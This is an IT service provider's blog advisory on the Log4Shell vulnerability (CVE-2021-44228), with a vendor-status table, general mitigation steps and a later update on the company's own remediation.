Citrix Service Provider (CSP) Model
06/09/2022Partner Pulse – December
06/09/2022Ultima have been made aware of a critical vulnerability which affects Log4j and is designated a 10 on the CVS vulnerability scale, the highest that a vulnerability can be classified. To learn more about the vulnerability, Mitre have published a handy article to support CVE-2021-44228:
CVE – CVE-2021-44228 (mitre.org)
What is Log4j & how is it being attacked?
Log4j is used to process log data for an array of different uses from websites to other server-based applications which use the Java library/component. Log4j is a Java based logging library. The exploit requires an attacker to remotely access an endpoint and send arbitrary data logged or otherwise processed by the log4j engine.
Where has the vulnerability been detected?
Whilst the full extent of the products and services affected is unknown, our close vendors and partners are working through the impact statements now. An update from our strategic vendors can be found below:
Vendor | Product Vulnerability Status from the Vendor as of 13th December 2021 | Details | Link for more info |
Check Point | Not Vulnerable | Have released an IPS update to help mitigate the risk | Check Point response to Apache Log4j Remote Code Execution (CVE-2021-44228) |
Cisco | Some Products VulnerableBig list being reviewed by Cisco, some are confirmed as not vulnerable and others confirmed as being vulnerable with some still in evaluation | Refer to the link for more details | https://tools.cisco.com/security/center/content /CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd |
Citrix | None announced as vulnerable so far, but many under investigationSome confirmed not vulnerable (eg ADC Some variants, XenServer)Others in progress | Citrix Security Advisory for Apache CVE-2021-44228 | |
VMware | Some Products VulnerableSome confirmed vulnerable (eg ESX, vCenter) with a workaround availableOthers in progress | Workarounds are available and patches are pending | https://www.vmware.com/security/advisories/VMSA-2021-0028.html |
Microsoft | Microsoft have announced that so far, there is no evidence that any services are vulnerable, the biggest risk is applications/services running behind a Microsoft Service such as Azure IaaS | Microsoft are said to be working on WAF Managed rulesets to help protectDefender Signatures are being updated to help protect | https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation – Microsoft Security Blog |
HPE | None announced as vulnerable so far, but all under investigationHPE have announced that they are investigating and will be publishing more information on their security vulnerability pages as detailed in the links | Document – Notice: Apache Software Log4j – Security Vulnerability CVE-2021-44228 | HPE SupportNew Messages! (hpe.com)Security Advisories | Aruba (arubanetworks.com) | |
HP | No information published at this time | ||
Nutanix | Some Products VulnerableSome are vulnerable with a Patch Pending and others in investigation | Nutanix WAF products have rules to help filter attempted exploits | Security Advisory 23-v1.3 (nutanix.com) |
If you would like to learn more about the vulnerability, BlueTeam have created a cheatsheet on GitHub which you can find here:
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-12 2204 UTC · GitHub
How can I protect my systems?
- Update where you can – A new version of Log4j (2.15.0) has been released with mitigates the remote code execution vulnerability. If this is difficult, product developers such as Unifi have started deploying new software versions which address this threat.
- If you’re a developer – The feature that is vulnerable within Log4j can also be disabled by setting log4j2.formatMsgNoLookups flag to true, or remove the JndiLookup class from the classpath used by Java. This should only be done if you are sure of the implications and a comprehensive implementation and test plan has been created and executed.
- Implement a next generation IPS – Such as Check Point with Intrusion Prevention System capabilities enabled were recently updated to prevent this exploit.
- Bolster Network Security – Because this vulnerability can also affect key infrastructure products such as VMWare, it would be advisable to setup access control lists or firewall rules to restrict access to certain approved management devices.
- Refer to guidance from the NCSC for this vulnerability – The National Cyber Security Centre have published some guidance for this available here – https://www.ncsc.gov.uk/news/apache-log4j-vulnerability
Are you an Ultima Managed Services customer?
As your security experts, we have already been working through every internal application and service and we will be updating this blog when we have additional updates from our vendors. To remediate in the meantime, we have carried out the following:
- Where customers have a managed firewall service, we have ensured that your firewalls IPS signatures are updated to help prevent the exploit
- Our monitoring platform has been confirmed as not vulnerable by the vendor
Ultima Labs Statement
As our IA-Cloud platform is based on Microsoft Azure Services, there aren’t any 3rd party integrations which could be vulnerable.
If you are still conscious about the vulnerability, please contact our Security Team and we will be on-hand to assist you.
17th DECEMBER UPDATE
What are Ultima doing to address the vulnerability within their systems?
Upon identification of the issue, we immediately undertook a review of all of our systems in partnership with our vendors to understand any systems that could potentially be vulnerable. We verified that our Next Generation Firewalls and Perimeter Security solutions were able to detect and block activity related to Log4j
Are any of Ultima’s systems vulnerable?
Any systems that were deemed vulnerable by the vendor have been remediated by implementing the approved solution from the vendor and have been validated via an internal vulnerability scan.
I’m a managed service customer, are any of your systems used to provide these services vulnerable?
All of the key solutions we use for our managed service customers are not vulnerable, we have shared a statement from LogicMonitor as many of our customers will have an on-premise collector as part of the monitoring platform – Log4Shell Security Vulnerability (CVE-2021-44228) | LogicMonitor